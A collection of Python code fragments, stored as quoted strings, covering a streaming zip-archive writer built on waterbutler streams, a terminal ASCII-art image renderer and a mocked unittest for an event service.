"= binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if",
"+= len(compressed) ret += compressed # buffer any overages if n != -1",
"self._buffer = ret[n:] ret = ret[:n] else: self._buffer = bytearray() # EOF is",
"files @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers = []",
"= yield from self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size += len(chunk)",
"0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value",
"dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)",
"self.zinfo.CRC = 0 # define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15,",
"flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment),",
"footer Note: This should be access after the file's data has been streamed.",
"return 0 @asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset = 0 for",
"= zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16",
"self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir",
"streams into a single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming stream",
"compressed # buffer any overages if n != -1 and len(ret) > n:",
"This should be access after the file's data has been streamed. \"\"\" return",
"self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename",
"self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a",
"bytes, of output. Includes header and footer Note: This should be access after",
"the archive's central directory \"\"\" dt = self.zinfo.date_time # modification date/time, in MSDOS",
"has been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class",
"| dt[1] << 5 | dt[2] dostime = dt[3] << 11 | dt[4]",
"import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file in a",
"Note: This class is tightly coupled to ZipStreamReader, and should not be used",
"value will be updated as file is streamed self.zinfo.CRC = 0 # define",
"ret[n:] ret = ret[:n] else: self._buffer = bytearray() # EOF is the buffer",
"are both empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream):",
"for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def",
"\"\"\"The file's header, for inclusion in the archive's central directory \"\"\" dt =",
"= filename.strip('/') # Build a ZipInfo instance to use for the file's header",
"used separately \"\"\" def __init__(self, file, stream, *args, **kwargs): self.file = file self.stream",
"+= compressed # buffer any overages if n != -1 and len(ret) >",
"zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size += len(compressed)",
"streams = [ZipLocalFile(each) for each in streams] # Append a stream for the",
"into a single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming stream should",
"directory for a zip archive Note: This class is tightly coupled to ZipStreamReader,",
"and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr =",
"self.file.compressed_size += len(compressed) ret += compressed # buffer any overages if n !=",
"stream\"\"\" def __init__(self, *streams): # Each incoming stream should be wrapped in a",
"= struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof()",
"coupled to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, files,",
"5 | (dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir",
"= ret[:n] else: self._buffer = bytearray() # EOF is the buffer and stream",
"output. Includes header and footer Note: This should be access after the file's",
"magic number for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, )",
"coupled to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file):",
"not be used separately \"\"\" def __init__(self, file): super().__init__() self.file = file @property",
"should not be used separately \"\"\" def __init__(self, file_tuple): filename, stream = file_tuple",
"data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic number for data",
"dt[3] << 11 | dt[4] << 5 | (dt[5] // 2) extra_data =",
"or len(ret) < n) and not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args,",
"= True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update",
"\"\"\"Create 16 byte descriptor of file CRC, file size, and compress size\"\"\" self._eof",
"def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' #",
"filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset =",
"filename = filename.strip('/') # Build a ZipInfo instance to use for the file's",
"+ filename + extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\"",
"= self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type,",
"len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush(",
"= zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08",
") self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits",
"just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header,",
"bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args,",
"zipfile import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams",
"dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]",
"def size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset =",
"\"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central",
"format dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 |",
"= files @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers =",
"\"\"\" def __init__(self, file, stream, *args, **kwargs): self.file = file self.stream = stream",
"= stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine",
"0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self):",
"file data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic number for",
"update a ZipLocalFile as chunks are read Note: This class is tightly coupled",
"a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information -",
"self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update a ZipLocalFile as",
"self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed",
"@property def total_bytes(self): \"\"\"Length, in bytes, of output. Includes header and footer Note:",
"!= -1 and len(ret) > n: self._buffer = ret[n:] ret = ret[:n] else:",
"streamed. \"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The",
"dt[2] dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] //",
"# Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress",
"self.zinfo.header_offset, ) return centdir + filename + extra_data + self.zinfo.comment @property def descriptor(self):",
"and stream are both empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret)",
"MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local",
"a ZipLocalFile as chunks are read Note: This class is tightly coupled to",
"are read Note: This class is tightly coupled to ZipStreamReader, and should not",
"ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file_tuple): filename, stream",
"__init__(self, *streams): # Each incoming stream should be wrapped in a _ZipFile instance",
"stream = file_tuple filename = filename.strip('/') # Build a ZipInfo instance to use",
"<< 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value will",
"+= self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size",
"single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming stream should be wrapped",
"class ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive Note: This class is",
"- needed to build the footer self.original_size = 0 self.compressed_size = 0 super().__init__(",
"b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a single, Zip-compressed",
"and should not be used separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__()",
"used separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files = files @property",
"dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr,",
"len(compressed) ret += compressed # buffer any overages if n != -1 and"
] |
[
"return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art from the provided image",
"x in range(width): if img.getpixel((x, y)) < 15: print('# ', end='') else: print('.",
"def get_aspect_ratio(img): \"\"\" return the aspect ratio of given image ar = width//height",
"black and white img = img.convert('L') # resize image to match terminal width",
"image ar = width//height return an int, we don't care about exact ratios",
"draw ascii art from the provided image use # for black use .",
"# resize image to match terminal width and aspect ratio img = resize_img(img)",
"in range(height): for x in range(width): if img.getpixel((x, y)) < 15: print('# ',",
"width this function depends upon shutil.get_terminal_size this works only on Python >= 3.3",
"upon shutil.get_terminal_size this works only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def",
"according to terminal width \"\"\" # convert image to black and white img",
"resize_img(img) width, height = img.size for y in range(height): for x in range(width):",
"img.convert('L') # resize image to match terminal width and aspect ratio img =",
"it according to terminal width \"\"\" # convert image to black and white",
"a resized image resize acc. to given terminal width keeping in mind the",
"and white img = img.convert('L') # resize image to match terminal width and",
"def get_term_width(): \"\"\" return terminal width this function depends upon shutil.get_terminal_size this works",
"care about exact ratios \"\"\" width, height = img.size aspect_ratio = width//height if",
"get_aspect_ratio(img): \"\"\" return the aspect ratio of given image ar = width//height return",
"# divide by 2 because we use 2 characters per pixel width =",
"by 2 because we use 2 characters per pixel width = term_width//2 aspect_ratio",
"= resize_img(img) width, height = img.size for y in range(height): for x in",
"range(width): if img.getpixel((x, y)) < 15: print('# ', end='') else: print('. ', end='')",
"convert image to black and white img = img.convert('L') # resize image to",
"print('# ', end='') else: print('. ', end='') print() if __name__ == '__main__': if",
"= get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art from",
"img.size aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio",
"\"\"\" draw ascii art from the provided image use # for black use",
"Image def get_term_width(): \"\"\" return terminal width this function depends upon shutil.get_terminal_size this",
"def draw_ascii(img): \"\"\" draw ascii art from the provided image use # for",
"resize it according to terminal width \"\"\" # convert image to black and",
"if len(sys.argv) < 2: print('Please enter an image name as argument') sys.exit(1) img_file",
"< 2: print('Please enter an image name as argument') sys.exit(1) img_file = sys.argv[1]",
"height with respect to given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\"",
"given image ar = width//height return an int, we don't care about exact",
"width and aspect ratio img = resize_img(img) width, height = img.size for y",
"black use . for white before drawing, convert the image to black and",
"= width//height return an int, we don't care about exact ratios \"\"\" width,",
"original aspect ratio \"\"\" term_width = get_term_width() # divide by 2 because we",
"ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a resized image resize acc.",
"name as argument') sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except",
"else: print('. ', end='') print() if __name__ == '__main__': if len(sys.argv) < 2:",
"img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art from the provided image use",
"= 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with respect to",
"= img.size aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio = 1 return",
"0: aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with",
"y)) < 15: print('# ', end='') else: print('. ', end='') print() if __name__",
"2 because we use 2 characters per pixel width = term_width//2 aspect_ratio =",
"def resize_img(img): \"\"\" return a resized image resize acc. to given terminal width",
"def get_height(width, aspect_ratio): \"\"\" return height with respect to given aspect ratio \"\"\"",
"get_height(width, aspect_ratio): \"\"\" return height with respect to given aspect ratio \"\"\" return",
"= term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height)) def",
"mind the original aspect ratio \"\"\" term_width = get_term_width() # divide by 2",
"we don't care about exact ratios \"\"\" width, height = img.size aspect_ratio =",
"return terminal width this function depends upon shutil.get_terminal_size this works only on Python",
"get_term_width(): \"\"\" return terminal width this function depends upon shutil.get_terminal_size this works only",
"on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect",
"aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a resized image resize",
"\"\"\" return a resized image resize acc. to given terminal width keeping in",
"PIL import Image def get_term_width(): \"\"\" return terminal width this function depends upon",
"argument') sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except IOError: print('Enter",
"keeping in mind the original aspect ratio \"\"\" term_width = get_term_width() # divide",
"shutil.get_terminal_size this works only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img):",
"then resize it according to terminal width \"\"\" # convert image to black",
"the image to black and white then resize it according to terminal width",
"in range(width): if img.getpixel((x, y)) < 15: print('# ', end='') else: print('. ',",
"image to black and white img = img.convert('L') # resize image to match",
"and white then resize it according to terminal width \"\"\" # convert image",
"print('. ', end='') print() if __name__ == '__main__': if len(sys.argv) < 2: print('Please",
"= img.size for y in range(height): for x in range(width): if img.getpixel((x, y))",
"= img.convert('L') # resize image to match terminal width and aspect ratio img",
"\"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio of given image",
"get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii",
"return a resized image resize acc. to given terminal width keeping in mind",
"pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width,",
"width, height = img.size for y in range(height): for x in range(width): if",
"resized image resize acc. to given terminal width keeping in mind the original",
"img.size for y in range(height): for x in range(width): if img.getpixel((x, y)) <",
"an image name as argument') sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file)",
"ratio of given image ar = width//height return an int, we don't care",
"width = term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height))",
"depends upon shutil.get_terminal_size this works only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns",
"sys from PIL import Image def get_term_width(): \"\"\" return terminal width this function",
"get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art from the",
"img = img.convert('L') # resize image to match terminal width and aspect ratio",
"exact ratios \"\"\" width, height = img.size aspect_ratio = width//height if aspect_ratio ==",
"print('Please enter an image name as argument') sys.exit(1) img_file = sys.argv[1] try: img",
"width//aspect_ratio def resize_img(img): \"\"\" return a resized image resize acc. to given terminal",
"terminal width \"\"\" # convert image to black and white img = img.convert('L')",
"len(sys.argv) < 2: print('Please enter an image name as argument') sys.exit(1) img_file =",
"given terminal width keeping in mind the original aspect ratio \"\"\" term_width =",
"\"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a resized image resize acc. to",
"and aspect ratio img = resize_img(img) width, height = img.size for y in",
"to black and white then resize it according to terminal width \"\"\" #",
"to black and white img = img.convert('L') # resize image to match terminal",
"only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the",
"2 characters per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width,",
"white before drawing, convert the image to black and white then resize it",
"to terminal width \"\"\" # convert image to black and white img =",
". for white before drawing, convert the image to black and white then",
"aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with respect",
"return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with respect to given aspect",
"15: print('# ', end='') else: print('. ', end='') print() if __name__ == '__main__':",
"import Image def get_term_width(): \"\"\" return terminal width this function depends upon shutil.get_terminal_size",
"this works only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\"",
"shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio of given image ar =",
"width keeping in mind the original aspect ratio \"\"\" term_width = get_term_width() #",
"respect to given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a",
"# convert image to black and white img = img.convert('L') # resize image",
"term_width = get_term_width() # divide by 2 because we use 2 characters per",
"int, we don't care about exact ratios \"\"\" width, height = img.size aspect_ratio",
"return an int, we don't care about exact ratios \"\"\" width, height =",
"import shutil import sys from PIL import Image def get_term_width(): \"\"\" return terminal",
">= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio of",
"ar = width//height return an int, we don't care about exact ratios \"\"\"",
"to given terminal width keeping in mind the original aspect ratio \"\"\" term_width",
"if __name__ == '__main__': if len(sys.argv) < 2: print('Please enter an image name",
"convert the image to black and white then resize it according to terminal",
"sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except IOError: print('Enter correct",
"resize image to match terminal width and aspect ratio img = resize_img(img) width,",
"aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art from the provided",
"before drawing, convert the image to black and white then resize it according",
"image name as argument') sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img)",
"white then resize it according to terminal width \"\"\" # convert image to",
"image to match terminal width and aspect ratio img = resize_img(img) width, height",
"characters per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio)",
"in mind the original aspect ratio \"\"\" term_width = get_term_width() # divide by",
"aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with respect to given aspect ratio",
"aspect ratio \"\"\" term_width = get_term_width() # divide by 2 because we use",
"== '__main__': if len(sys.argv) < 2: print('Please enter an image name as argument')",
"\"\"\" return height with respect to given aspect ratio \"\"\" return width//aspect_ratio def",
"width//height return an int, we don't care about exact ratios \"\"\" width, height",
"aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio def",
"drawing, convert the image to black and white then resize it according to",
"we use 2 characters per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height",
"use 2 characters per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height =",
"y in range(height): for x in range(width): if img.getpixel((x, y)) < 15: print('#",
"because we use 2 characters per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img)",
"print() if __name__ == '__main__': if len(sys.argv) < 2: print('Please enter an image",
"use # for black use . for white before drawing, convert the image",
"__name__ == '__main__': if len(sys.argv) < 2: print('Please enter an image name as",
"an int, we don't care about exact ratios \"\"\" width, height = img.size",
"for y in range(height): for x in range(width): if img.getpixel((x, y)) < 15:",
"= sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except IOError: print('Enter correct file') sys.exit(1)",
"height = img.size aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio = 1",
"acc. to given terminal width keeping in mind the original aspect ratio \"\"\"",
"from PIL import Image def get_term_width(): \"\"\" return terminal width this function depends",
"range(height): for x in range(width): if img.getpixel((x, y)) < 15: print('# ', end='')",
"to match terminal width and aspect ratio img = resize_img(img) width, height =",
"height = get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art",
"aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\"",
"\"\"\" term_width = get_term_width() # divide by 2 because we use 2 characters",
"for white before drawing, convert the image to black and white then resize",
"if aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\"",
"width//height if aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio):",
"img.getpixel((x, y)) < 15: print('# ', end='') else: print('. ', end='') print() if",
"to given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a resized",
"aspect ratio img = resize_img(img) width, height = img.size for y in range(height):",
"for x in range(width): if img.getpixel((x, y)) < 15: print('# ', end='') else:",
"return the aspect ratio of given image ar = width//height return an int,",
"function depends upon shutil.get_terminal_size this works only on Python >= 3.3 \"\"\" return",
"\"\"\" width, height = img.size aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio",
"black and white then resize it according to terminal width \"\"\" # convert",
"width, height = img.size aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio =",
"', end='') else: print('. ', end='') print() if __name__ == '__main__': if len(sys.argv)",
"width \"\"\" # convert image to black and white img = img.convert('L') #",
"2: print('Please enter an image name as argument') sys.exit(1) img_file = sys.argv[1] try:",
"works only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return",
"ratio img = resize_img(img) width, height = img.size for y in range(height): for",
"== 0: aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height",
"', end='') print() if __name__ == '__main__': if len(sys.argv) < 2: print('Please enter",
"end='') print() if __name__ == '__main__': if len(sys.argv) < 2: print('Please enter an",
"of given image ar = width//height return an int, we don't care about",
"= width//height if aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio def get_height(width,",
"\"\"\" return terminal width this function depends upon shutil.get_terminal_size this works only on",
"Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio",
"get_term_width() # divide by 2 because we use 2 characters per pixel width",
"art from the provided image use # for black use . for white",
"the aspect ratio of given image ar = width//height return an int, we",
"end='') else: print('. ', end='') print() if __name__ == '__main__': if len(sys.argv) <",
"'__main__': if len(sys.argv) < 2: print('Please enter an image name as argument') sys.exit(1)",
"use . for white before drawing, convert the image to black and white",
"provided image use # for black use . for white before drawing, convert",
"for black use . for white before drawing, convert the image to black",
"terminal width this function depends upon shutil.get_terminal_size this works only on Python >=",
"ratio \"\"\" term_width = get_term_width() # divide by 2 because we use 2",
"draw_ascii(img): \"\"\" draw ascii art from the provided image use # for black",
"# for black use . for white before drawing, convert the image to",
"aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return",
"white img = img.convert('L') # resize image to match terminal width and aspect",
"term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img):",
"height)) def draw_ascii(img): \"\"\" draw ascii art from the provided image use #",
"3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio of given",
"import sys from PIL import Image def get_term_width(): \"\"\" return terminal width this",
"1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with respect to given",
"match terminal width and aspect ratio img = resize_img(img) width, height = img.size",
"divide by 2 because we use 2 characters per pixel width = term_width//2",
"resize acc. to given terminal width keeping in mind the original aspect ratio",
"\"\"\" return the aspect ratio of given image ar = width//height return an",
"img = resize_img(img) width, height = img.size for y in range(height): for x",
"resize_img(img): \"\"\" return a resized image resize acc. to given terminal width keeping",
"terminal width and aspect ratio img = resize_img(img) width, height = img.size for",
"< 15: print('# ', end='') else: print('. ', end='') print() if __name__ ==",
"don't care about exact ratios \"\"\" width, height = img.size aspect_ratio = width//height",
"\"\"\" # convert image to black and white img = img.convert('L') # resize",
"height = img.size for y in range(height): for x in range(width): if img.getpixel((x,",
"return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio of given image ar",
"image resize acc. to given terminal width keeping in mind the original aspect",
"given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a resized image",
"as argument') sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except IOError:",
"ascii art from the provided image use # for black use . for",
"= get_term_width() # divide by 2 because we use 2 characters per pixel",
"image use # for black use . for white before drawing, convert the",
"enter an image name as argument') sys.exit(1) img_file = sys.argv[1] try: img =",
"img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except IOError: print('Enter correct file')",
"shutil import sys from PIL import Image def get_term_width(): \"\"\" return terminal width",
"about exact ratios \"\"\" width, height = img.size aspect_ratio = width//height if aspect_ratio",
"if img.getpixel((x, y)) < 15: print('# ', end='') else: print('. ', end='') print()",
"aspect ratio of given image ar = width//height return an int, we don't",
"return width//aspect_ratio def resize_img(img): \"\"\" return a resized image resize acc. to given",
"per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return",
"= get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw",
"from the provided image use # for black use . for white before",
"return height with respect to given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img):",
"ratios \"\"\" width, height = img.size aspect_ratio = width//height if aspect_ratio == 0:",
"terminal width keeping in mind the original aspect ratio \"\"\" term_width = get_term_width()",
"the provided image use # for black use . for white before drawing,",
"image to black and white then resize it according to terminal width \"\"\"",
"with respect to given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return",
"aspect_ratio): \"\"\" return height with respect to given aspect ratio \"\"\" return width//aspect_ratio",
"the original aspect ratio \"\"\" term_width = get_term_width() # divide by 2 because",
"this function depends upon shutil.get_terminal_size this works only on Python >= 3.3 \"\"\""
] |
[] |
[
"self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\")",
"= self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response,",
"import patch, Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self,",
"self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response =",
"1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response,",
"self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event)",
"response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId()",
"self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"):",
"data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create()",
"patch, Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService):",
"class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService =",
"def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect",
"Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response =",
"= self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"): return [self.event] else: return",
"import TestCase from unittest.mock import patch, Mock from rpiatipo.Events import Event, EventService class",
"def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value =",
"def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id):",
"import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\":",
